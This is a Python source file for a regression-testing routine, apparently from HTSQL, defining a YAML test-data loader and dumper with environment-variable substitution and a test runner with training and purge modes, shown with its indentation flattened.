Pull the state from a derived state.
Note that only statistical information is pulled from
the derived state.
`other` (:class:`TestState`)
A derived state, the state created by a suite for
the suite test cases.
"""
self.passed = other.passed
self.failed = other.failed
self.updated = other.updated
self.is_exiting = other.is_exiting
# The base classes for the YAML loaders and dumpers. When available,
# use the fast, LibYAML-based variants, if not, use the slow pure-Python
# versions.
BaseYAMLLoader = yaml.SafeLoader
if hasattr(yaml, 'CSafeLoader'):
BaseYAMLLoader = yaml.CSafeLoader
BaseYAMLDumper = yaml.SafeDumper
if hasattr(yaml, 'CSafeDumper'):
BaseYAMLDumper = yaml.CSafeDumper
class RegressYAMLLoader(BaseYAMLLoader):
"""
Loads test data from a YAML file.
`routine` (:class:`RegressRoutine`)
The testing engine.
`with_input` (Boolean)
Indicates that the YAML file contains input records.
`with_output` (Boolean)
Indicates that the YAML file contains output records.
`stream` (a file or a file-like object)
The YAML stream.
"""
# A pattern to match substitution variables in `!environ` nodes.
environ_pattern = r"""
\$ \{
(?P<name> [a-zA-Z_][0-9a-zA-Z_.-]*)
(?: : (?P<default> [0-9A-Za-z~@#^&*_;:,./?=+-]*) )?
\}
"""
environ_regexp = re.compile(environ_pattern, re.X)
# A pattern for valid values of substitution variables.
environ_value_pattern = r"""^ [0-9A-Za-z~@#^&*_;:,./?=+-]* $"""
environ_value_regexp = re.compile(environ_value_pattern, re.X)
def __init__(self, routine, with_input, with_output, stream):
super(RegressYAMLLoader, self).__init__(stream)
self.routine = routine
# The list of permitted record classes.
self.records = []
# A mapping of record_class -> case_class.
self.case_by_record = {}
# A mapping of record_class -> the set of all attributes.
self.all_keys_by_record = {}
# A mapping of record_class -> the set of mandatory attributes.
self.mandatory_keys_by_record = {}
# Generate a list of permitted record classes.
self.init_records(with_input, with_output)
def init_records(self, with_input, with_output):
# Gather the record classes from the available test cases.
for case_class in self.routine.cases:
if with_input and case_class.Input is not None:
self.records.append(case_class.Input)
self.case_by_record[case_class.Input] = case_class
if with_output and case_class.Output is not None:
self.records.append(case_class.Output)
self.case_by_record[case_class.Output] = case_class
# For each record class, prepare the set of all attributes and
# the set of mandatory attributes.
for record_class in self.records:
all_keys = set()
for field in record_class.fields:
if field.is_any:
all_keys = None
break
all_keys.add(field.attribute.replace('_', '-'))
self.all_keys_by_record[record_class] = all_keys
mandatory_keys = set()
for field in record_class.fields:
if field.is_any or not field.is_mandatory:
continue
mandatory_keys.add(field.attribute.replace('_', '-'))
if not mandatory_keys:
mandatory_keys = None
self.mandatory_keys_by_record[record_class] = mandatory_keys
def load(self):
"""
Loads test data from the YAML stream.
"""
# That ensures the stream contains one document, parses it and
# returns the corresponding object.
return self.get_single_data()
def construct_document(self, node):
# We override this to ensure that any produced document is
# a test record of expected type.
data = super(RegressYAMLLoader, self).construct_document(node)
if type(data) not in self.records:
raise yaml.constructor.ConstructorError(None, None,
"unexpected document type",
node.start_mark)
return data
def construct_yaml_str(self, node):
# Always convert a `!!str` scalar node to a byte string.
# By default, PyYAML converts an `!!str`` node containing non-ASCII
# characters to a Unicode string.
value = self.construct_scalar(node)
value = value.encode('utf-8')
return value
def construct_yaml_map(self, node):
# Detect if a node represent test data and convert it to a test record.
# We assume that the node represents a test record if it contains
# all mandatory keys of the record class. Otherwise, we assume it
# is a regular dictionary.
#
# It would be much better to perform this detection on the tag
# resolution phase. However this phase does not give us access
# to the mapping keys, so we have no choice but do it during the
# construction phase.
# Check if we got a mapping node.
if not isinstance(node, yaml.MappingNode):
raise yaml.constructor.ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
# Objects corresponding to the key nodes.
keys = []
# Objects corresponding to the value nodes.
values = []
# The mapping of key object -> value object.
value_by_key = {}
# The mapping of key object -> the mark of the key node.
key_mark_by_key = {}
# The mapping of key object -> the mark of the value node.
value_mark_by_key = {}
# Convert the key and the value nodes.
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=True)
try:
hash(key)
except TypeError as exc:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
"found unacceptable key (%s)" % exc,
key_node.start_mark)
keys.append(key)
value = self.construct_object(value_node, deep=True)
values.append(value)
value_by_key[key] = value
key_mark_by_key[key] = key_node.start_mark
value_mark_by_key[key] = value_node.start_mark
# Find a record class such that the node contains all
# the mandatory record fields.
detected_record_class = None
key_set = set(keys)
for record_class in self.records:
mandatory_keys = self.mandatory_keys_by_record[record_class]
if mandatory_keys is None:
continue
if key_set.issuperset(mandatory_keys):
detected_record_class = record_class
break
# If we can't find a suitable record class, it must be a regular
# dictionary.
if detected_record_class is None:
return dict(list(zip(keys, values)))
# Check that the node does not contain any keys other than
# the record fields.
all_keys = self.all_keys_by_record[detected_record_class]
if all_keys is not None:
for key in keys:
if key not in all_keys:
raise yaml.constructor.ConstructorError(None, None,
"unexpected key %r; expected one of %s"
% (key, ", ".join(sorted(all_keys))),
key_mark_by_key[key])
# Generate the record attributes: validate and normalize
# the field values.
attributes = {}
for field in detected_record_class.fields:
if field.is_any:
continue
key = field.attribute.replace('_', '-')
if key in value_by_key:
value = value_by_key[key]
try:
value = field.val(value)
except ValueError as exc:
raise yaml.constructor.ConstructorError(None, None,
"invalid field %r (%s)" % (key, exc),
value_mark_by_key[key])
else:
value = field.default
attributes[field.attribute] = value
# Record where the node was found.
location = "\"%s\", line %s" \
% (node.start_mark.name, node.start_mark.line+1)
# Instantiate and return the test record.
case_class = self.case_by_record[detected_record_class]
try:
record = detected_record_class(self.routine, case_class,
attributes, location)
except ValueError as exc:
raise yaml.constructor.ConstructorError(None, None,
"invalid test data (%s)" % exc,
node.start_mark)
return record
def construct_environ(self, node):
# Substitute environment variables in `!environ` scalars.
def replace(match):
# Substitute environment variables with values.
name = match.group('name')
default = match.group('default') or ''
value = os.environ.get(name, default)
if not self.environ_value_regexp.match(value):
raise yaml.constructor.ConstructorError(None, None,
"invalid value of environment variable %s: %r"
% (name, value), node.start_mark)
return value
# Get the scalar value and replace all ${...} occurences with
# values of respective environment variables.
value = self.construct_scalar(node)
value = value.encode('utf-8')
value = self.environ_regexp.sub(replace, value)
# Blank values are returned as `None`.
if not value:
return None
return value
# Register custom constructors for `!!str``, `!!map`` and ``!environ``.
RegressYAMLLoader.add_constructor(
'tag:yaml.org,2002:str',
RegressYAMLLoader.construct_yaml_str)
RegressYAMLLoader.add_constructor(
'tag:yaml.org,2002:map',
RegressYAMLLoader.construct_yaml_map)
RegressYAMLLoader.add_constructor(
'!environ',
RegressYAMLLoader.construct_environ)
# Register a resolver for ``!environ``.
RegressYAMLLoader.add_implicit_resolver(
'!environ', RegressYAMLLoader.environ_regexp, ['$'])
class RegressYAMLDumper(BaseYAMLDumper):
"""
Dumps test data to a YAML file.
`routine` (:class:`RegressRoutine`)
The testing engine.
`with_input` (Boolean)
Indicates that the YAML file will contain input records.
`with_output` (Boolean)
Indicates that the YAML file will contain output records.
`stream` (a file or a file-like object)
The stream where the YAML document is written.
"""
def __init__(self, routine, with_input, with_output, stream, **keywords):
# FIXME: we don't really need extra `with_*` parameters, this
# constructor is always called with with_input=False, with_output=True.
super(RegressYAMLDumper, self).__init__(stream, **keywords)
self.routine = routine
# The set of permitted record classes.
self.records = set()
# Gather the permitted record classes.
self.init_records(with_input, with_output)
# Check if the PyYAML version is suitable for dumping.
self.check_version()
def init_records(self, with_input, with_output):
# Gather permitted record classes.
for case_class in self.routine.cases:
if with_input and case_class.Input is not None:
self.records.add(case_class.Input)
if with_output and case_class.Output is not None:
self.records.add(case_class.Output)
def check_version(self):
# We require PyYAML >= 3.07 built with LibYAML >= 0.1.2 to dump
# YAML data. Other versions may produce slightly different output.
# Since the YAML files may be kept in a VCS repository, we don't
# want minor formatting changes generate unnecessarily large diffs.
try:
pyyaml_version = yaml.__version__
except AttributeError:
pyyaml_version = '3.05'
try:
import _yaml
libyaml_version = _yaml.get_version_string()
except ImportError:
libyaml_version = None
if pyyaml_version < '3.07':
raise ScriptError("PyYAML >= 3.07 is required"
" to dump test output")
if libyaml_version is None:
raise ScriptError("PyYAML built with LibYAML bindings"
" is required to dump test output")
if libyaml_version < '0.1.2':
raise ScriptError("LibYAML >= 0.1.2 is required"
" to dump test output")
def dump(self, data):
"""
Dumps the data to the YAML stream.
"""
self.open()
self.represent(data)
self.close()
def represent_str(self, data):
# Serialize a string. We override the default string serializer
# to use the literal block style for multi-line strings.
tag = None
style = None
if data.endswith('\n'):
style = '|'
tag = 'tag:yaml.org,2002:str'
return self.represent_scalar(tag, data, style=style)
def represent_record(self, data):
# Complain when given a record of unexpected type.
if type(data) not in self.records:
return super(RegressYAMLDumper, self).represent_undefined(data)
# Extract the fields skipping those with the default value.
mapping = []
for field in data.fields:
if field.is_any:
continue
name = field.attribute.replace('_', '-')
value = getattr(data, field.attribute)
if value == field.default:
continue
mapping.append((name, value))
# Generate a mapping node.
return self.represent_mapping('tag:yaml.org,2002:map', mapping,
flow_style=False)
# Register custom representers for `str` and `TestData`.
RegressYAMLDumper.add_representer(
str, RegressYAMLDumper.represent_str)
RegressYAMLDumper.add_multi_representer(
TestData, RegressYAMLDumper.represent_record)
class RegressRoutine(Routine):
"""
Implements the `regress` routine.
"""
name = 'regress'
aliases = ['test']
arguments = [
Argument('suites', SeqVal(StrVal()), None, is_list=True),
]
options = [
InputOption,
TrainOption,
PurgeOption,
ForceOption,
QuietOption,
]
hint = """run regression tests"""
help = """
This routine runs a series of test cases.
A test case takes input data and produces output data. The test
succeeds if it runs without errors and its output data coincides with
the expected output.
Input and output test data are stored in the YAML format. Run
'%(executable)s help regress <case>' to get the description of the
format for a specific test type.
Test cases are organized into suites. A test suite is a special type of
a test case that contains other test cases.
By default, the routine executes all tests in the given YAML file. To
run only specific test suites, list their identifiers in the command
line.
Unless option `--force` is used, the testing process will halt on the
first test failure.
The routine reads the input data from the standard input stream. Use
option `--input FILE` to read the input data from a file instead.
The routine supports training mode, in which it allows you to add
expected output for new tests and updated expected output for existing
tests. Use option `--train` to run the routine in the training mode.
When a test case is removed, the routine does not remove obsolete
expected output records automatically. Use option `--purge` to remove
stale output records.
By default, the routine prints the header of every executed tests. Use
option `--quiet` to print only errors and final statistics.
"""
# This text is written to YAML files generated by the routine.
output_help = """
#
# This file contains expected test output data for regression tests.
# It was generated automatically by the `regress` routine.
#
"""
# List of supported types of test cases.
cases = [
AppTestCase,
LoadAppTestCase,
DefineTestCase,
IncludeTestCase,
SuiteTestCase,
QueryTestCase,
CtlTestCase,
StartCtlTestCase,
EndCtlTestCase,
PythonCodeTestCase,
PythonCodeIncludeTestCase,
SQLTestCase,
SQLIncludeTestCase,
WriteToFileTestCase,
ReadFromFileTestCase,
RemoveFilesTestCase,
MakeDirTestCase,
RemoveDirTestCase,
]
# Represents the mutable state of the testing process.
state_class = TestState
@classmethod
def get_help(cls, **substitutes):
"""
Returns a long description of the routine.
"""
# Produce routine description of the form:
# {help}
#
# Test cases: (run ... for more help)
# {case.name} : {case.hint}
# ...
lines = []
help = super(RegressRoutine, cls).get_help(**substitutes)
if help is not None:
lines.append(help)
if cls.cases:
if lines:
lines.append("")
lines.append("Test cases:"
" (run '%(executable)s help regress <case>'"
" for more help)" % substitutes)
for case_class in cls.cases:
case_name = case_class.name
case_hint = case_class.get_hint()
if case_hint is not None:
lines.append(" %-24s : %s" % (case_name, case_hint))
else:
lines.append(" %s" % case_name)
return "\n".join(lines)
@classmethod
def get_feature(cls, name):
"""
Finds the test case by name.
"""
for case_class in cls.cases:
if case_class.name == name:
return case_class
raise ScriptError("unknown test case %r" % name)
def run(self):
# Get the test input data.
input = self.load_input(self.input)
# Initialize the testing state.
state = self.state_class()
# Create a test case.
case = input.case_class(self, state, input, None)
# Check if all test suites specified by the user exist.
if self.suites:
available_suites = case.get_suites()
for suite in self.suites:
if suite not in available_suites:
raise ScriptError("unknown suite %r" % suite)
# Start the testing in the selected mode.
if self.train:
case.train()
else:
case.verify()
# Display the statistics.
self.ctl.out("="*72)
if state.passed:
self.ctl.out("TESTS PASSED: %s" % state.passed)
if state.failed:
self.ctl.out("TESTS FAILED: %s" % state.failed)
if state.updated:
self.ctl.out("TESTS UPDATED: %s" % state.updated)
self.ctl.out()
# Produce a fatal error if at least one test failed.
if state.failed:
if state.failed == 1:
message = "a test failed"
else:
message = "%s tests failed" % state.failed
raise ScriptError(message)
def load_input(self, path):
# Load test input data from a file. If `path` is `None`,
# load from the standard input.
assert isinstance(path, maybe(str))
if path is not None:
stream = open(path, 'rb')
else:
stream = self.ctl.stdin
loader = RegressYAMLLoader(self, True, False, stream)
try:
input = loader.load()
except yaml.YAMLError as exc:
raise ScriptError("failed to load test input data: %s" % exc)
return input
def load_output(self, path):
# Load test output data from a file.
assert isinstance(path, str)
stream = open(path, 'rb')
loader = RegressYAMLLoader(self, False, True, stream)
try:
input = loader.load()
except yaml.YAMLError as exc:
raise ScriptError("failed to load test output data: %s" % exc)
return input
def save_output(self, path, output):
# Serialize and write test output data to a file.
assert isinstance(path, str)
assert isinstance(output, TestData)
stream = open(path, 'wb')
if self.output_help is not None:
self.ctl.out(trim_doc(self.output_help), file=stream)
self.ctl.out(file=stream)
dumper = RegressYAMLDumper(self, False, True, stream)
try:
dumper.dump(output)
except yaml.YAMLError as exc:
raise ScriptError("failed to write test output data: %s" % exc)
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.